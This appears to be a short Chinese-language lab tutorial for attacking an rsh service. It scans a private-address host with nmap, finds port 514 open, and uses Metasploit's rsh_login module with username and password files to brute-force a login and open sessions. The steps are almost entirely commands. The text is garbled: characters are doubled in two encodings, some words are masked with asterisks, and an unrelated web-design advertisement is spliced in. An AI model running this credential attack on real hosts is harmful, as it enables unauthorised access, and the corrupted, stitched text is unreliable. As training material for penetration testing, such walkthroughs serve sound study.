一、利用nmap工具掃描目標(biāo)主機(jī)
成都創(chuàng)新互聯(lián)自2013年起,先為疏附等服務(wù)建站,疏附等地企業(yè),進(jìn)行企業(yè)商務(wù)咨詢服務(wù)。為疏附企業(yè)網(wǎng)站制作PC+手機(jī)+微官網(wǎng)三網(wǎng)同步一站式服務(wù)解決您的所有建站問題。
1.1使用nmap命令對(duì)目標(biāo)主機(jī)進(jìn)行掃描。
1.2在終端中輸入命令“nmap –sV 192.168.1.3”,對(duì)目標(biāo)主機(jī)進(jìn)行端口掃描,發(fā)現(xiàn)開放514端口,開放tcpwrapped服務(wù)。
1.3在終端中輸入命令“msfconsole”,啟動(dòng)MSF終端。
1.4在終端中輸入命令“search rsh_login”,搜索rsh_login的相關(guān)工具和***載荷。
1.5在終端中輸入命令“use auxiliary/scanner/rservices/rsh_login”,啟用漏洞利用模塊, 提示符就會(huì)提示進(jìn)入到該路徑下。
1.6在終端中輸入命令“set RHOST 192.168.1.3”,設(shè)置目標(biāo)主機(jī)的IP地址。
1.7在終端中輸入命令“set RPORT 514”,設(shè)置目標(biāo)主機(jī)的端口號(hào)。
1.8在終端中輸入“set PASS_FILE /home/passwd.txt”,設(shè)置破解使用的密碼文件。
1.9在終端中輸入“set USER_FILE /home/user.txt”, 設(shè)置破解使用的登錄用戶名文件。
1.10在終端中輸入“exploit”, 開始向目標(biāo)主機(jī)***,會(huì)話建立,表示溢出成功。
1.11在終端中輸入“sessions”,查看會(huì)話數(shù)。